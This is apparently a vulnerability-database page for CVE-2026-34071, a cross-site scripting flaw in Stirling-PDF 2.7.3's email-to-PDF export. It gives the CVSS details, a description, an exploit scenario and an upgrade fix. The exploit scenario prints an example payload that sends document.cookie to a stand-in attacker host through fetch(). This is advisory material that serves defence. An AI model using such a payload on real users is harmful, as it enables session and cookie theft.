What is the CVSS score of CVE-2026-34071?

CVE-2026-34071 has a CVSS 3.1 base score of 5.4 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N. EPSS exploitation probability: 0.0%.

Which versions of Stirling Pdf are affected by CVE-2026-34071?

Organizations using Stirling-PDF should be aware of moderate risk from CVE-2026-34071, a cross-site scripting vulnerability rated CVSS 5.4.

How to fix or mitigate CVE-2026-34071?

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Verify Content-Security-Policy and output encoding.

Stirling Pdf CVE-2026-34071

EUVD-2026-16271 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-03-26 GitHub_M

XSS Stirling Pdf

5.4

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

5.4 MEDIUM

AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

EUVD ID Assigned

Mar 26, 2026 - 17:15 euvd

EUVD-2026-16271

Analysis Generated

Mar 26, 2026 - 17:15 vuln.today

CVE Published

Mar 26, 2026 - 17:00 nvd

MEDIUM 5.4

DescriptionGitHub Advisory

Stirling-PDF is a locally hosted web application that allows you to perform various operations on PDF files. In version 2.7.3, the /api/v1/convert/eml/pdf endpoint with parameter downloadHtml=true returns unsanitized HTML from the email body with Content-Type: text/html. An attacker who sends a malicious email to a Stirling-PDF user can achieve JavaScript execution when that user exports the email using the "Download HTML intermediate file" feature. Version 2.8.0 fixes the issue.

AnalysisAI

Stirling-PDF version 2.7.3 fails to sanitize HTML content from email bodies in the /api/v1/convert/eml/pdf endpoint when the downloadHtml=true parameter is set, allowing unauthenticated remote attackers to inject and execute arbitrary JavaScript code. An attacker can craft a malicious email that, when processed by a Stirling-PDF user through the 'Download HTML intermediate file' feature, executes JavaScript in the user's browser context with access to local data and session tokens. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	The CVSS v3.1 score of 5.4 (Medium) reflects a network-accessible vector with low attack complexity and no privilege requirements, but limited impact scope (user context only). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker crafts a malicious email containing JavaScript payloads embedded in HTML tags (e.g., <img src=x onerror="fetch('https://attacker.com/?cookie='+document.cookie)"> or <script>alert('XSS')</script>) and sends it to a Stirling-PDF user. When the user processes this email through the Stirling-PDF interface and requests the 'Download HTML intermediate file' export with downloadHtml=true, the application returns the email body as unsanitized HTML with Content-Type: text/html, causing the user's browser to parse and execute the embedded JavaScript. …
Remediation	Upgrade Stirling-PDF to version 2.8.0 or later to obtain the patched version. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. …

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-34071 vulnerability details – vuln.today

Back